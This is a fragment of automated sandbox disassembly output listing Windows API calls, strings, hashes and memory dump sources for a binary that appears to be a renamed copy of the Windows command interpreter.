                                • Part of subcall function 00007FF744F13578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F1359C
                                • Part of subcall function 00007FF744F13578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135C3
                                • Part of subcall function 00007FF744F13578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135D9
                                • Part of subcall function 00007FF744F13578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135ED
                                • Part of subcall function 00007FF744F13578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F13602
                              • _get_osfhandle.MSVCRT ref: 00007FF744F032F3
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF744F032A4), ref: 00007FF744F03309
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF744F03384
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F211DF
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                              • String ID:
                              • API String ID: 611521582-0
                              • Opcode ID: eb4f65db57e5e21f7b3e544c495bce771b340a8d61a99cf5019a4a82effd2785
                              • Instruction ID: 7d0347e0f821baaf050b10e2ffad0585b0238758c56454e3d3d2112cf9cdec78
                              • Opcode Fuzzy Hash: eb4f65db57e5e21f7b3e544c495bce771b340a8d61a99cf5019a4a82effd2785
                              • Instruction Fuzzy Hash: 8EA18132B0C612CBF714BF62A8842BDEAA1FB89B55F895135CD0E467C8DF3C94459620
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CreateFile_open_osfhandle
                              • String ID: con
                              • API String ID: 2905481843-4257191772
                              • Opcode ID: 3459eb2e79cd0d2b6a799ffdb85acc031fe8388b8b96825e157d57a9e1669ecc
                              • Instruction ID: 746d794112acb6530e2a6ff26cc5ccc8e0a1ade66c8cd796d3da553ef2236f6a
                              • Opcode Fuzzy Hash: 3459eb2e79cd0d2b6a799ffdb85acc031fe8388b8b96825e157d57a9e1669ecc
                              • Instruction Fuzzy Hash: 3B71743260C681CAE760BF56A480679FAA0FB49B61F994234DE5D427D8DF3CD8459B10
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                              • String ID: CSVFS$NTFS$REFS
                              • API String ID: 3510147486-2605508654
                              • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                              • Instruction ID: 9f4b5936edc2866ff2910dc7e2726382f52930e4d73e31ab811d6cd979096073
                              • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                              • Instruction Fuzzy Hash: DF614B32608BC2CAEB65AF22D8843E9B7A4FB45B85F884135CE0D4B798DF78D108D710
                              APIs
                              • longjmp.MSVCRT(?,00000000,00000000,00007FF744F07279,?,?,?,?,?,00007FF744F0BFA9), ref: 00007FF744F24485
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: longjmp
                              • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                              • API String ID: 1832741078-366822981
                              • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                              • Instruction ID: 109a54b415bf797ec0dfebacb15f12dd6c5695099882bd940f00190373921ac1
                              • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                              • Instruction Fuzzy Hash: 8AC17C20E0CA42C2F724FE5791C66B9A791BB86B84FDC1036DD0D976D9CF7EA445A320
                              APIs
                                • Part of subcall function 00007FF744F0CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDA6
                                • Part of subcall function 00007FF744F0CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDBD
                              • memset.MSVCRT ref: 00007FF744F0BA2B
                              • wcschr.MSVCRT ref: 00007FF744F0BA8A
                              • wcschr.MSVCRT ref: 00007FF744F0BAAA
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heapwcschr$AllocProcessmemset
                              • String ID: -$:.\$=,;$=,;+/[] "
                              • API String ID: 2872855111-969133440
                              • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                              • Instruction ID: 59741425758ddda153433a6607d33792f22b7ed85af1229b3d19ae8a17905996
                              • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                              • Instruction Fuzzy Hash: E2B15021A1D682C2EB60BF5694C8279A6A0FB84B84FD94135CE5E477D8DF3CE845A320
                              APIs
                              • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF744F16570,?,?,?,?,?,?,00000000,00007FF744F16488), ref: 00007FF744F16677
                              • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF744F16570,?,?,?,?,?,?,00000000,00007FF744F16488), ref: 00007FF744F1668F
                              • _errno.MSVCRT ref: 00007FF744F166A3
                              • wcstol.MSVCRT ref: 00007FF744F166C4
                              • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF744F16570,?,?,?,?,?,?,00000000,00007FF744F16488), ref: 00007FF744F166E4
                              • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF744F16570,?,?,?,?,?,?,00000000,00007FF744F16488), ref: 00007FF744F166FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswdigit$_errnoiswalphawcschrwcstol
                              • String ID: +-~!$APerformUnaryOperation: '%c'
                              • API String ID: 2348642995-441775793
                              • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                              • Instruction ID: 15892242fbd41ab1058907dab7ef25dced591be2279c1aca43cd1de7ec2e8cb4
                              • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                              • Instruction Fuzzy Hash: C6712C6290CA46C6F7607F16D490279B7B0EB49B94B98D135DE4E062D8EF3CAC84E720
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$_wcsicmp$AllocProcess
                              • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                              • API String ID: 3223794493-3086019870
                              • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                              • Instruction ID: 12d4b15e22430fa8dd1971d9ce4685fcf6ae55beeeabca1876c5fac0c510c836
                              • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                              • Instruction Fuzzy Hash: 84516C21A0CA42C6EB14BF16A484179ABA0FB59B90FDC9135CE5E073E8DF3CE445A720
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: LocalTime$ErrorLast_get_osfhandle
                              • String ID: %s$/-.$:
                              • API String ID: 1644023181-879152773
                              • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                              • Instruction ID: afbb29a62f2e140d1c20b5992957d8a12a6f4bc0d4d98db597663a07c6026f40
                              • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                              • Instruction Fuzzy Hash: 4E919322A0CA42D2EB10BF66D4802B9E6A0FF84B84FCC4235DD4E426DDDE3DE545E721
                              APIs
                              • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF744F27251), ref: 00007FF744F2628E
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ObjectSingleWait
                              • String ID: wil
                              • API String ID: 24740636-1589926490
                              • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                              • Instruction ID: 0a26a06a6b134e2d57132ff0621672f8f352521033e60e0a25c2c95e3e95aebf
                              • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                              • Instruction Fuzzy Hash: A9413F21A0C542C3F7607F12E48027AA6A1FF85785FE89131DD4946BD8DF3EE845A721
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                              • String ID: $Application$System
                              • API String ID: 3377411628-1881496484
                              • Opcode ID: 081ad1a78538691813d500f2119477f8c8ef04af017c9f27d6f6f5b033d517ce
                              • Instruction ID: 7d003354ed1d1cc055c6362b48e16dd0549a41830c45f8198357cbd72b7a286f
                              • Opcode Fuzzy Hash: 081ad1a78538691813d500f2119477f8c8ef04af017c9f27d6f6f5b033d517ce
                              • Instruction Fuzzy Hash: 37411C32B08A41DAE720AF61E4803EDB7A5FB89748F885135DE4E42B98EF3CD145C750
                              APIs
                                • Part of subcall function 00007FF744F106C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106D6
                                • Part of subcall function 00007FF744F106C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106F0
                                • Part of subcall function 00007FF744F106C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F1074D
                                • Part of subcall function 00007FF744F106C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F10762
                              • _wcsicmp.MSVCRT ref: 00007FF744F125CA
                              • _wcsicmp.MSVCRT ref: 00007FF744F125E8
                              • _wcsicmp.MSVCRT ref: 00007FF744F1260F
                              • _wcsicmp.MSVCRT ref: 00007FF744F12636
                              • _wcsicmp.MSVCRT ref: 00007FF744F12650
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmp$Heap$AllocProcess
                              • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                              • API String ID: 3407644289-1668778490
                              • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                              • Instruction ID: 4d3e807708b7a280612284a41794b0d11a3177ec574e75bba1fe25758d262200
                              • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                              • Instruction Fuzzy Hash: 81311D21A1C542C6F7107FA3E895279E6A4AF84B40F9D8035DE0E562DDDE3CE804E721
                              APIs
                                • Part of subcall function 00007FF744F0D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D46E
                                • Part of subcall function 00007FF744F0D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D485
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D4EE
                                • Part of subcall function 00007FF744F0D3F0: iswspace.MSVCRT ref: 00007FF744F0D54D
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D569
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D58C
                              • iswspace.MSVCRT ref: 00007FF744F17EEE
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heapiswspace$AllocProcess
                              • String ID: A
                              • API String ID: 3731854180-3554254475
                              • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                              • Instruction ID: 85cf29677a1db540bd2eb2a6c15a20ac2e49462d2df349e5e77da16022986b9d
                              • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                              • Instruction Fuzzy Hash: 81A16D2290DA82CAE760BF52A49067AF6A0FB55790F888035DE8D477DDDF3CA445E720
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                              • String ID: PE
                              • API String ID: 2941894976-4258593460
                              • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                              • Instruction ID: 4dd6f995f69fc7891e918e7167e2190e00c22b5c7419d57fb063f96c21bc480e
                              • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                              • Instruction Fuzzy Hash: 0F414261A0C651C7E720BF62E490279FAA0FB89B90F884130DE5D42BD9DF3DE545DB20
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Enum$Openwcsrchr
                              • String ID: %s=%s$.$\Shell\Open\Command
                              • API String ID: 3402383852-1459555574
                              • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                              • Instruction ID: e22584f8ea8b91f28cfba3215280dbf6fcfd0b0cc83845eab2d974f05baff222
                              • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                              • Instruction Fuzzy Hash: 03A18F61B0D642C2EB51BF56A0906BAE2A0FF85B90FC84535DE4D07BDCDE7DE941A320
                              APIs
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F0D6
                              • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F1BA
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F1E7
                              • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F1FF
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F2BB
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswdigit$iswspacewcschr
                              • String ID: )$=,;
                              • API String ID: 1959970872-2167043656
                              • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                              • Instruction ID: c8919e68bff2b47a5e4b0fcea17178696a64c3ac30c23caf54151209c4d6b29d
                              • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                              • Instruction Fuzzy Hash: 88416A65E0C652C6FB64BF12A598379F6A0AF90751FCC9031CE88422E8DF7CA495A730
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorLast$InformationVolumeiswalphatowupper
                              • String ID: %04X-%04X$:
                              • API String ID: 930873262-1938371929
